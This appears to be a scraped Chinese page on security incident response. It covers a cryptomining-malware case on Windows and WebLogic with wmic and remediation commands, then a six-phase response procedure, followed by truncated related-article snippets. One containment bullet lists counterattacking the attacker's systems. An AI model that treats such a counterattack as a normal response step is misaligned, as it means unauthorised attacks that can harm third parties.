    1、安装杀毒软件,保持监控开启,定期全盘扫描

    2、及时更新 Windows 安全补丁,开启防火墙临时关闭端口,如 445、135、137、138、139、3389 等端口

    3、及时更新 web 漏洞补丁,升级 web 组件

    4、备份。重要的资料一定要备份,谨防资料丢失

    5、强化网络安全意识,陌生链接不点击,陌生文件不要下载,陌生邮件不要打开

    0x06 应急响应实战之挖矿病毒

    随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一。病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑 CPU 占用率高,C 盘可使用空间骤降,电脑温度升高,风扇噪声增大等问题。

    应急场景

    某天上午重启服务器的时候,发现程序启动很慢,打开任务管理器,发现 cpu 被占用接近 100%,服务器资源占用严重。
    在这里插入图片描述
    事件分析

    登录网站服务器进行排查,发现多个异常进程:
    在这里插入图片描述
    分析进程参数:

    wmic process get caption,commandline /value >> tmp.txt
    在这里插入图片描述
    TIPS:

    在 windows 下查看某个运行程序(或进程)的命令行参数

    使用下面的命令:

    wmic process get caption,commandline /value

    如果想查询某一个进程的命令行参数,使用下列方式:

    wmic process where caption=”svchost.exe” get caption,commandline /value

    这样就可以得到进程的可执行文件位置等信息。

    访问该链接:
    在这里插入图片描述
    Temp 目录下发现 Carbon、run.bat 挖矿程序:
    在这里插入图片描述
    具体技术分析细节详见 《利用WebLogic漏洞挖矿事件分析》:

    https://www.anquanke.com/post/id/92223

    清除挖矿病毒:关闭异常进程、删除c盘temp目录下挖矿程序 。

    临时防护方案

    1、根据实际环境路径,删除 WebLogic 程序下列 war 包及目录

    rm -f /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war

    rm -f /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war

    rm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

    2、重启 WebLogic 或系统后,确认以下链接访问是否为 404

    http://x.x.x.x:7001/wls-wsat

    防范措施

    新的挖矿攻击展现出了类似蠕虫的行为,并结合了高级攻击技术,以增加对目标服务器感染的成功率。通过利用永恒之蓝(EternalBlue)、web 攻击多种漏洞,如 Tomcat 弱口令攻击、Weblogic WLS 组件漏洞、Jboss 反序列化漏洞,Struts2 远程命令执行等,导致大量服务器被感染挖矿程序的现象 。总结了几种预防措施:

    1、安装安全软件并升级病毒库,定期全盘扫描,保持实时防护

    2、及时更新 Windows 安全补丁,开启防火墙临时关闭端口

    3、及时更新 web 漏洞补丁,升级 web 组件

    参考链接:

    https://cloud.tencent.com/document/product/296/9605

    https://www.cnblogs.com/shellr00t/p/6943796.html

    https://www.exehack.net/5106.html

    展开全文
  • 护网演习网络安全应急预案 包括 :各类安全事件处置及流程图:木马后门事件 异常登录事件 钓鱼邮件事件 漏洞攻击事件 暴力破解事件 数据窃取事件
  • 网络应急响应流程

    2020-12-12 08:32:49
    网络应急响应流程及工作内容 What is 应急响应对应的英文是 Incident response或emergency responcse,通常是指一个组织为了应对各种意外事件的发生所做的准备以及在事件发生后所采取的措施。 当企业发生黑客入侵、...

    网络应急响应流程及工作内容

    What is

    应急响应对应的英文是 Incident response或emergency responcse,通常是指一个组织为了应对各种意外事件的发生所做的准备以及在事件发生后所采取的措施。

    当企业发生黑客入侵、系统崩溃货其他影响业务正常运行的安全时间是,急需第一时间进行处理,使企业的网络信息系统在最短的时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。

    常见的应急响应事件

    • web入侵:网页挂马、主页篡改、webshell
    • 系统入侵:病毒木马、勒索软件、圆孔后门
    • 网络攻击:DDoS攻击、DNS劫持、ARP攻击

    网络信息安全应急处理服务原则

    保密性原则

    • 实施人员应对安全事件处理服务过程中获知的任何甲方的系统信息承担保密责任和义务,不得泄露给第三方单位或个人,不得利用这些信息进行任何侵害甲方的行为。

    规范性原则

    • 实施人员应提供专业的服务人员依照规范的操作流程进行安全事件处理服务,所有服务人员必须对各自的操作过程和结果进行详细记录,最终按照规范的报告格式提供完整的服务报告,重要操作需要获得甲方人员授权。
    • 重要操作需要获得甲方人员授权。

    最小影响原则

    • 安全事件处理服务工作应尽可能减少对原系统和网络正常运行的影响,尽量避免对原网络运行和业务正常运转产生显著影响(包括系统性能明显下降、网络阻塞、服务中断等),如无法避免,则必须向甲方予以说明。

    应急响应工作流程 6个阶段 17个重要控制点

    阶段一:准备阶段

    重要控制点

    • 服务需求界定
    • 服务合同或协议签订
    • 服务方案制定
    • 人员和工具准备

    ※ 服务实施阶段: 准备阶段

    ※ 输入: 合同及项目建议书或投标文件(可参见“售前部分”目录下“项目建议书.doc”或投标文件(根据实际情况定))

    ※ 交付成果文档: 合同、保密协议

    • 《安全服务项目范围约定表》(可参见阶段一目录下“安全服务项目范围约定表.doc”)
    • 《应急响应实施方案》(可参见阶段一目录下“应急响应实施方案.doc”)
    • 《应急响应实施授权书》(可参见阶段一目录下“应急响应实施授权书.doc”)
    • 《应急响应实施人员清单》(可参见阶段一目录下“应急值班制度及人员值班表.doc”)

    1.1 阶段目标

    • 在安全事件处理前为处理事件做好准备工作;
    • 并让客户了解老男孩应急响应服务的实施方式及内容,向客户提交《应急响应实施方案》,同客户签订《应急响应实施授权书》。

    1.2 阶段任务

    • 1.2.1 服务需求界定

        1. 实施人员应明确甲方的应急需求,并填写《安全服务项目范围约定表》;
        1. 实施人员应根据甲方提供的网络拓扑图,以及业务系统主管及运维人员介绍,了解甲方的各项业务功能及各项业务功能之间的相关性,应确定支持各种业务功能的相应信息系统资源及其它资源,明确相关信息的保密性、完整性和可用性要求;必要时利用《业务影响分析(BIA)(模板)》进行分析。
    • 1.2.2 服务合同或协议签订

        1. 与甲方签订应急服务合同或协议;
        1. 应急服务合同或协议应明确双方的职责和责任;
        1. 实施方与甲方签订保密协议;
        1. 与甲方签订《应急响应实施授权书》。
    • 1.2.3 服务方案制定

        1. 实施人员应在了解甲方应急需求的基础上制定服务方案;
        1. 服务方案应根据业务影响分析的结果,明确应急响应的恢复目标(可利用业务影响分析(BIA)(模板)》进行分析, (可参见:目录“阶段一”中的《附 录 B C业务影响分析(BIA)示例.doc),包括:
        • – 关键业务功能及恢复的优先顺序;
        • – 恢复时间目标和恢复点的范围;
        1. 服务方案应带有完善的检测技术规范,检测技术规范至少包含检测目的、工具、步骤等内容。常见的检测技术规范有,但不限于:
        • – Windows系统检测技术规范;
        • – UNIX系统检测技术规范;
        • – 数据库系统检测技术规范;
        • – 常用应用系统检测技术规范;
        • – 常见网络安全事件检测技术规范。
    • 1.2.4 人员和工具准备

        1. 实施人员应根据甲方的需求准备处置网络安全事件的工具包,包括常用的系统命令、工具软件等;(可参见:目录“阶段一”下的目录“应急工具包”)
        1. 实施人员的工具包应保存在不可更改的移动介质上,如一次性可写光盘;
        1. 实施人员的工具包应定期更新,并有完善的版本控制;
        1. 实施人员应能随时调动一定数量的应急服务人员,并给出实施人员联系清单(可参见阶段一目录下“应急值班制度及人员值班表.doc”)。

    阶段二:检测阶段

    重要控制点

    • 检测对象及范围确定
    • 检测方案确定
    • 检测实施

    ※ 服务实施阶段: 检测实施

    ※ 输入: 《安全服务项目范围约定表》(可参见阶段一目录下“安全服务项目范围约定表.doc”)

    《应急响应实施方案》(可参见阶段一目录下“应急响应实施方案.doc”)

    ※ 输出成果文档: 《应急响应现场处置授权申请及检测方案》(可参见阶段二目录下“应急响应现场处置授权申请及检测方案.doc”)

    2.1 阶段目标

    • 对网络安全事件做出初步的动作和响应,根据获得的初步材料和分析结果,预估事件的范围和影响程度,制定进一步的响应策略,并且保留相关证据。

    2.2 阶段任务

    • 2.2.1 检测对象及范围确定

        1. 实施人员对发生异常的系统进行初步分析,判断是否真正发生了安全事件;
        1. 实施人员应与甲方共同确定检测对象及范围;
        1. 检测对象及范围应得到甲方的书面授权。
    • 2.2.2 检测方案确定

        1. 实施人员应和甲方共同确定检测方案;
        1. 实施人员制定的检测方案应明确实施人员所使用的检测规范;
        1. 实施人员制定的检测方案应明确实施人员的检测范围,其检测范围应仅限于甲方已授权的与安全事件相关的数据,对甲方的机密性数据信息未经授权不得访问;
        1. 实施人员制定的检测方案应包含实施方案失败的应变和回退措施;
        1. 实施人员应与甲方充分沟通,并预测应急处理方案可能造成的影响。
    • 2.2.3 检测实施

        1. 实施人员应按照检测方案实施检测;
        1. 检测宜包含但不限于以下几个方面,注意及时截屏:
        • i. 收集并记录系统信息,特别是在执行备份的过程中可能遗失或无法捕获的信息,如所有当前网络连接;所有当前进程;当前登陆的活动用户;所有打开了的文件,在断开网络连接时可能有些文件会被删除;其他所有容易丢失的数据,如内存和缓存中的数据(具体操作可参考《网络与信息安全应急响应技术指南规范》);
        • ii. 备份被入侵的系统,至少应备份已确认被攻击了的系统及系统上的用户数据;
        • iii. 隔离被入侵的系统。把备份的文件传到与生产系统相隔离的测试系统,并在测试系统上恢复被入侵系统, 或者断开被破坏的系统并且直接在这系统上进行分析;
        • iv. 查找其他系统上的入侵痕迹。其他系统包括同一IP地址段或同一网段的系统、处于同一域的其他系统、具有相同网络服务的系统、具有同一操作系统的系统等;
        • v. 检查防火墙、IDS和路由器等设备的日志,分析哪些日志信息源于以前从未注意到的系统连接或事件,并且确定哪些系统已经被攻击;
        • vi. 确定攻击者的入侵路径和方法。分析系统的日志或通过使用工具,判断攻击者的入侵路径和方法;
        • vii. 确定入侵者进入系统后的行为。分析各种日志文件或借用一些检测工具和分析工具,确定入侵者如何实施攻击并获得系统的访问权限;
        1. 实施人员的检测工作应在甲方的监督与配合下完成,并及时记录操作过程;
        1. 实施人员应配合甲方,将所检测到的安全事件向有关部门和人员通报或报告。

    阶段三:抑制阶段

    重要控制点

    • 抑制方法确定
    • 抑制方法认可
    • 抑制实施

    ※ 服务实施阶段: 抑制实施

    ※ 输入: 《应急响应现场处置授权申请及检测方案》(可参见阶段二目录下“应急响应现场处置授权申请及检测方案.doc”

    ※ 输出成果文档: 《应急响应事件检测分析及处置报告》(可参见阶段三目录下“应急响应事件检测分析及处置报告.doc”)

    3.1 阶段目标

    • 限制攻击的范围,抑制潜在的或进一步的攻击和破坏。

    3.2 阶段任务

    • 3.2.1 抑制方法确定

        1. 实施人员应在检测分析的基础上确定与安全事件相应的抑制方法;
        1. 在确定抑制方法时,需要考虑:
        • – 全面评估入侵范围, 入侵带来的影响和损失;
        • – 通过分析得到的其它结论,例如入侵者的来源;
        • – 甲方的业务连续性;
        • – 甲方的业务和重点决策过程;
    • 3.2.2 抑制方法认可

        1. 实施人员应告知甲方所面临的首要问题;
        1. 实施人员所确定的抑制方法和相应的措施应得到甲方的认可;
        1. 在采取抑制措施之前,实施人员应与甲方充分沟通,告知可能存在的风险,制定应变和回退措施,并与甲方达成协议。
    • 3.2.3 抑制实施

        1. 实施人员应严格按照相关约定实施抑制,不得随意更改抑制措施和范围,如有必要更改,须获得甲方的授权;
        1. 抑制措施宜包含但不限于以下几个方面,注意及时截屏:
        • – 提高系统或网络行为的监控级别;
        • – 修改防火墙、路由器等设备的过滤规则;
        • – 尽可能停用系统服务;
        • – 停止文件共享;
        • – 监视系统和网络活动;
        • – 改变口令;
        • – 停用或删除被攻破的登录账号;
        • – 将被攻陷系统从网络断开;
        • – 暂时关闭被攻陷系统;
        • – 设置陷阱,如蜜罐系统;
        • – 反击攻击者的系统;
        1. 实施人员应使用可信的工具进行安全事件的抑制处理,不得使用受害系统已有的不可信文件。

    阶段四:根除阶段

    重要控制点

    • 根除方法确定
    • 根除方法认可
    • 根除实施

    ※ 服务实施阶段: 根除阶段

    ※ 输入: 《应急响应事件检测分析及处置报告》(可参见阶段三目录下“应急响应事件检测分析及处置报告.doc”)

    ※ 交付成果文档: 《应急响应事件根除及恢复报告》(可参见阶段五目录下“应急响应事件根除及恢复报告.doc”)

    4.1 阶段目标

    • 在事件被抑制之后,通过对有关恶意代码或行为的分析结果,找出导致网络安全事件发生的根源,并予以彻底消除。

    4.2 阶段任务

    • 4.2.1 根除方法确定

        1. 实施人员应协助甲方检查所有受影响的系统,在准确判断网络安全事件原因的基础上,提出根除的方案建议;
        1. 由于入侵者一般都会安装后门或使用其他的方法以便于在将来有来有机会侵入该被攻陷的系统,因此在确定根除方法时,需要了解攻击者是如何入侵,以及这种入侵方法相同和所有类似的各种方法。
    • 4.2.2 根除方法认可

        1. 实施人员应明确告知甲方所采取的根除措施可能带来的风险,制定应变和回退措施,并获得甲方的书面授权;
        1. 实施人员应协助甲方进行根除方法的具体实施。
    • 4.2.3 根除实施

        1. 实施人员应使用可信的工具进行安全事件的根除处理,不得使用受害系统已有的不可信文件;
        1. 根除措施宜包含但不限于以下几个方面,注意及时截屏:
        • – 改变全部可能受到攻击的系统的口令;
        • – 去除所有的入侵通路和入侵者做的修改;
        • – 修补系统和网络漏洞;
        • – 增强防护功能,复查所有防护措施(如防火墙)的配置,并依照不同的入侵行为进行调整,对未受防护或者防护不够的系统增加新的防护措施;
        • – 提高检测能力,及时更新诸如IDS和其他入侵报告工具等的检测策略,以保证将来对类似的入侵进行检测;
        • – 重新安装系统,并对系统进行调整,包括打补丁、修改系统错误等,以保证系统不会出现新的漏洞。

    阶段五:恢复阶段

    重要控制点

    • 恢复方法确定
    • 恢复系统

    ※ 服务实施阶段: 恢复阶段

    ※ 输入:维护手册、安装手册(根据客户实际情况定)

    ※ 交付成果文档: 《应急响应事件根除及恢复报告》(可参见阶段五目录下“应急响应事件根除及恢复报告.doc”)

    5.1 阶段目标

    • 恢复网络安全事件所涉及到的系统,并还原到正常状态。恢复工作应十分小心,避免出现误操作导致数据的丢失。

    5.2 阶段任务

    • 5.2.1 恢复方法确定

        1. 实施人员应告知甲方一个或多个能从网络安全事件中恢复系统的方法,以及每种方法可能存在的风险;
        1. 实施人员应与甲方共同制定系统恢复的方案,根据抑制与根除的情况,协助甲方选择合理的恢复方法。恢复方案涉及到以下方面:
        • – 如何获得访问受损设施或地理区域的授权;
        • – 如何通知相关系统的内部和外部业务伙伴;
        • – 如何获得安装所需的硬件部件;
        • – 如何获得装载备份介质;
        • – 如何恢复关键操作系统和应用软件;
        • – 如何恢复系统数据;
        • – 如何成功运行备用设备;
        1. 如果涉及到涉密数据,确定恢复方法时应遵守相关的保密要求。
    • 5.2.2 恢复系统

        1. 实施人员配合甲方维护人员按照系统的初始化安全策略恢复系统;
        1. 恢复系统时,应根据系统中各子系统的重要性,确定系统恢复的顺序;
        1. 系统恢复过程宜包含但不限于:
        • – 利用正确的备份恢复用户数据和配置信息;
        • – 开启系统和应用服务,将受到入侵或者怀疑存在漏洞而关闭的服务,修改后重新开放;
        • – 将恢复后的系统连接到网络;
        1. 对于不能彻底恢复配置和清除系统上的恶意文件,或不能肯定系统经过根除处理后是否已恢复正常时,实施人员应建议甲方维护人员选择彻底重建系统;
        1. 实施人员协助甲方维护人员验证恢复后的系统是否运行正常;
        1. 实施人员宜帮助甲方对重建后的系统进行安全加固。

    阶段六:总结阶段

    重要控制点

    • 总结
    • 报告

    ※ 服务实施阶段: 总结阶段

    ※ 输入:实施过程记录

    ※ 交付成果文档: 《应急响应报告》(可参见“阶段六”目录下“XXX应急响应报告(模板).doc”)

    6.1 阶段目标

    • 回顾网络安全事件处理的全过程,整理与事件相关的各种信息,进行总结,并尽可能地把所有情况记录到文档中。

    6.2 阶段任务

    • 6.2.1 总结

        1. 实施人员应及时检查网络安全事件处理记录是否齐全,是否具备可追溯性,并对事件处理过程进行总结和分析;
        1. 应急处理总结的具体工作包括但不限于:
        • – 事件发生原因分析;
        • – 事件现象总结;
        • – 系统的损害程度评估;
        • – 事件损失估计;
        • – 形成总结报告;
        • – 相关工具和文档(如记录、方案、报告等)归档。
    • 6.2.2 报告

        1. 实施人员应向甲方提供完备的网络安全事件处理报告;
        1. 实施人员应向甲方提供网络安全方面的建议和意见,必要时指导和协助甲方实施;
        1. 实施人员宜告知甲方可能涉及法律诉讼方面的要求或影响。
    展开全文
  • 为切实加强XX单位信息系统密码安全的防范,做好应对信息系统密码安全突发公共事件的应急处理工作,进一步提供预防和控制信息系统密码安全突发事件的能力和水平,极大限度地减轻和消除信息系统密码安全突发时间的危害...
  • 第3章 网络安全应急响应技术流程与方法 3.1 应急响应准备阶段 应急响应的准备阶段主要工作分为两个部分,应急预案的编制和应急响应的具体准备工作,包括但不限于小组划分、日常运维检测、确定影响范围、事件类型...
  • 该标准对信息安全应急响应计划的编制、计划中对组织机构、工作流程和保障措施提出了明确的要求。 ·GB/T 28517—2012《信息安全技术 网络安全事件描述和交换格式》。该标准对网络安全事件描述和交换格式的基本数据...
  • 突发事件信息接报主要落实安全生产应急值守信息报告,支持多种方式(如电话、移动终端APP)突发事件报送信息的接收与处置,包括信息接收、送审报告、处理、信息处理流程化管理和对报告/简报的智能编制;该系统基于三...
  • 2-2 风险评估过程示意 2.1.3 风险评估与应急响应的关系 风险评估是一切网络安全保障工作的起点,对网络安全应急响应也不例外,风险识别和处理的过程是应急响应工作准备阶段的前序。“知己知彼,百战不殆”,...
  • 图5-12 Web 入侵应急响应流程图 在正式应急前的信息搜集阶段,我们要尽可能地搜集更多的信息,以辅助后续的应急,比如,Web访问日志,审计设备日志,服务器上面的各种安全日志等,以及拓扑结构、端口开放情况、...
  • 信息安全应急处理服务... 建立信息安全应急处理服务流程 处理服务流程 流程图中应包括每个 服务技术要 阶段对应的职责输入输出等 求 制定信息安全应急处理服务规范并按照 已制定的信息安全应急处理服务规 2. 规范实施
  • 信息安全应急处理服务... 建立信息安全应急处理服务流程 处理服务流程 流程图中应包括每个 服务技术要 阶段对应的职责输入输出等 求 制定信息安全应急处理服务规范并按照 已制定的信息安全应急处理服务规 2. 规范实施
  • 系统集成项目实施流程图

    热门讨论 2011-10-22 10:19:17
    系统集成项目实施流程图系统集成项目实施流程图系统集成项目实施流程图
  • 四、施工现场生产安全应急处理预案-------------8 五、应急准备检查记录和应急事故处理流程图----13 六、附表------------------------------------16 ****项目部生产安全事故 应急准备和响应程序 一、...
  • 信息安全应急响应与风 险评估及加固 日温 信息安全应急体系 风险评估方法和实施流程 安全加固方法和实施流程 应急划 计划 基础信息网络 当流程 技术 重要信息系统 应急计划类型(1/2: 计划 目的 范囤 业务连续性...
  • 图4-1 应急演练流程图 演练准备阶段是确保演练成功的关键。包括制定计划、设计方案、方案评审、动员培训、演练保障等几个方面。 演练实施阶段是演练的实际操作阶段,包括系统准备、演练启动、演练执行、演练解说、...
  • 信息系统安全措施和应急预案,有流程图和文字说明比较全面
  • TT最近状态不错,工作投入,热情满满。并且学会了提问。这其实是个很好的迹象。 不能总是夸她,她也会有点点小不顺心...中央网络安全和信息化领导小组办公室,2017年1月10日,印发了《国家网络安全事件应急预案》,里
  • 个人公众号 bypass)当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出...
  • 网络与信息安全应急处置预案

    千次阅读 2018-11-06 01:09:20
    网络与信息安全应急处置预案

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 6,705
精华内容 2,682
关键字:

安全应急流程图